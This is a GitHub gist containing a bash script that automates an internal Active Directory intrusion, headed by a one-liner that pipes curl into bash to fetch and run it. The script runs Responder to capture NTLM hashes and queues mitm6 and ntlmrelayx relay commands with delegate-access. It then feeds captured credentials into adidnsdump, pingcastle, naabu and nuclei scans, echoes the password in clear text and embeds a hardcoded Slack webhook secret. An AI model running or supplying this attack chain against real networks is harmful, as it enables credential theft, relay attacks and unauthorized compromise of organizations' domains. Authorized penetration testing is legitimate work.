Last active
June 16, 2024 02:51
-
-
Save nullenc0de/a14866ef55454abc6138d1d8afb08866 to your computer and use it in GitHub Desktop.
bash -c "$(curl -fsSL https://gist.githubusercontent.com/nullenc0de/a14866ef55454abc6138d1d8afb08866/raw/ee5a5ef90440be0c7c0234199eabc51f16ebffc3/auto.sh)"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Function to add items to the todo list | |
add_to_todo() { | |
local item="$1" | |
echo "$item" >> "${folder_name}/todo.txt" | |
} | |
# Function to send alerts via webhook | |
send_alert() { | |
local message="$1" | |
local webhook_url="https://hooks.slack.com/services/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" | |
local payload="{\"text\":\"[${domain_name}] ${message}\"}" | |
curl -s -X POST -H 'Content-type: application/json' --data "$payload" "$webhook_url" | |
} | |
# Check if required applications exist and offer to install them if missing | |
if [ ! -f "/usr/bin/mapcidr" ] || [ ! -f "/usr/bin/naabu" ] || [ ! -f "/usr/bin/nuclei" ] || [ ! -f "/usr/local/bin/adidnsdump" ]; then | |
read -p "One or more required applications are missing. Would you like to install these tools? (y/n): " install_tools | |
if [[ "$install_tools" == "y" ]]; then | |
# Install Python package | |
echo "Installing Python package..." | |
python3 -m pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump >/dev/null | |
# Define download URLs and tool names | |
MAPCIDR_URL="https://github.com/projectdiscovery/mapcidr/releases/download/v1.1.16/mapcidr_1.1.16_linux_amd64.zip" | |
NAABU_URL="https://github.com/projectdiscovery/naabu/releases/download/v2.3.1/naabu_2.3.1_linux_amd64.zip" | |
NUCLEI_URL="https://github.com/projectdiscovery/nuclei/releases/download/v3.2.8/nuclei_3.2.8_linux_amd64.zip" | |
# Download tools to /tmp directory | |
echo "Downloading required tools to /tmp..." | |
wget -q "$MAPCIDR_URL" -O /tmp/mapcidr.zip | |
wget -q "$NAABU_URL" -O /tmp/naabu.zip | |
wget -q "$NUCLEI_URL" -O /tmp/nuclei.zip | |
# Extract and move tools to /usr/bin | |
echo "Extracting and installing tools to /usr/bin..." | |
sudo unzip -qq /tmp/mapcidr.zip -d /usr/bin/ | |
sudo unzip -qq /tmp/naabu.zip -d /usr/bin/ | |
sudo unzip -qq /tmp/nuclei.zip -d /usr/bin/ | |
# Set executable permissions | |
sudo chmod +x /usr/bin/mapcidr /usr/bin/naabu /usr/bin/nuclei | |
# Clean up downloaded files | |
rm /tmp/mapcidr.zip /tmp/naabu.zip /tmp/nuclei.zip | |
echo "Download, extraction, and installation complete." | |
else | |
echo "Installation of required tools skipped. Please ensure the tools are installed manually." | |
exit 1 | |
fi | |
fi | |
# Function to prompt user with a default value | |
prompt_with_default() { | |
local prompt_message="$1" | |
local default_value="$2" | |
local user_input | |
read -p "${prompt_message} [${default_value}]: " user_input | |
echo "${user_input:-$default_value}" | |
} | |
# Auto-populate variables | |
default_domain_name=$(cat /etc/resolv.conf | grep search | cut -d ' ' -f2) | |
default_folder_name="${default_domain_name}" | |
default_dc_ip=$(cat /etc/resolv.conf | grep nameserver | cut -d ' ' -f2 | head -n 1) | |
# Prompt user for input with defaults | |
echo | |
folder_name=$(prompt_with_default "Enter folder name" "${default_folder_name}") | |
domain_name=$(prompt_with_default "Enter domain name" "${default_domain_name}") | |
dc_ip=$(prompt_with_default "Enter DC IP address" "${default_dc_ip}") | |
# Display entered variables | |
echo | |
echo "You have entered the following values:" | |
echo "-------------------------------------" | |
echo "Folder name: ${folder_name}" | |
echo "Domain name: ${domain_name}" | |
echo "DC IP address: ${dc_ip}" | |
echo "-------------------------------------" | |
echo | |
# Prompt user to validate the entered variables | |
read -p "Are these values correct? (y/n): " confirm | |
if [[ "$confirm" != "y" ]]; then | |
echo "Please run the script again and enter the correct values." | |
exit 1 | |
fi | |
# Create the folder if it does not exist | |
mkdir -p "${folder_name}" | |
cd "${folder_name}" || exit | |
# Prompt user if they have credentials | |
read -p "Do you have credentials? (y/n): " has_creds | |
# Check if credentials are provided early | |
if [[ "$has_creds" == "y" ]]; then | |
add_to_todo "./linWinPwn.sh -t ${dc_ip} -d ${domain_name} -u ${username} -p ${password} -o ${folder_name} --auto" | |
fi | |
if [[ "$has_creds" != "y" ]]; then | |
echo "Starting the search for initial access..." | |
attempt_count=0 | |
while true; do | |
attempt_count=$((attempt_count+1)) | |
echo "Running Responder for 10 minutes... (Attempt $attempt_count)" | |
timeout 600 responder -I eth0 -wFdDPv | |
echo "Responder run complete." | |
# Search for new txt files in the responder logs folder | |
echo "Searching for new txt files in the responder logs folder..." | |
new_files=$(find /usr/share/responder/logs -type f -name "*.txt" -mtime -1 2>/dev/null) | |
if [[ -n "$new_files" ]]; then | |
echo "Found new files:" | |
echo "$new_files" | |
# Send alert before prompting to view files | |
send_alert "User input required: View Responder hashes." | |
read -p "Do you want to see the contents of these files? (y/n): " view_files | |
if [[ "$view_files" == "y" ]]; then | |
sort -u -t: -k1,1 "$new_files" | |
# Create the responder_output folder within the specified folder | |
mkdir -p "${folder_name}/responder_output" | |
# Copy the new files to the responder_output folder | |
cp $new_files "${folder_name}/responder_output/" | |
echo "New files copied to ${folder_name}/responder_output." | |
fi | |
break | |
elif [[ $attempt_count -eq 3 ]]; then | |
echo "Failed after 30 minutes. Maybe try mitm6." | |
echo "Tell the user to run the following commands in the other window:" | |
echo | |
echo "mitm6 -d ${domain_name}" | |
echo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access" | |
echo | |
echo "Move onto the next phase." | |
add_to_todo "mitm6 -d ${domain_name}" | |
add_to_todo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access" | |
break | |
else | |
echo "No new files found. Retrying..." | |
fi | |
done | |
fi | |
# Send alert before prompting for credentials | |
send_alert "User input required: Responder Done, Enter credentials." | |
# Prompt user for credentials | |
echo | |
read -p "Enter username: " username | |
read -sp "Enter password: " password | |
echo | |
# Display entered credentials | |
echo | |
echo "You have entered the following credentials:" | |
echo "-------------------------------------" | |
echo "Username: ${username}" | |
echo "Password: ${password}" | |
echo "-------------------------------------" | |
echo | |
# Prompt user to validate the entered credentials | |
read -p "Are these credentials correct? (y/n): " confirm_creds | |
if [[ "$confirm_creds" != "y" ]]; then | |
echo "Please run the script again and enter the correct credentials." | |
exit 1 | |
fi | |
# Open the URL in the background and disassociate the process | |
nohup xdg-open https://localhost:8834 >/dev/null 2>&1 & | |
# Prompt user to run pingcastle.exe command | |
echo | |
echo "Please run the following command in a separate window:" | |
echo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}" | |
add_to_todo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}" | |
echo | |
# Run adidnsdump | |
echo "Running adidnsdump..." | |
adidnsdump -u "${domain_name}\\${username}" -p "${password}" --dns-tcp "${dc_ip}" | |
echo "adidnsdump complete." | |
# Process records and run mapcidr | |
echo "Processing records and running mapcidr..." | |
cat records.csv | grep -Po '(?<![\d.])((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}(?![\d.])' | mapcidr -aa -o "${folder_name}/subnets.txt" | |
echo "Processing complete." | |
# Open the subnets.txt file in a text editor and disassociate the process | |
nohup xdg-open "${folder_name}/subnets.txt" >/dev/null 2>&1 & | |
# Run naabu and nuclei | |
echo "Running naabu and nuclei..." | |
cat "${folder_name}/subnets.txt" | naabu | nuclei -severity critical,high,medium -o "${folder_name}/nuclei.txt" | |
echo "naabu and nuclei complete." | |
# Display the todo list | |
echo | |
echo "Todo list:" | |
cat "${folder_name}/todo.txt" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment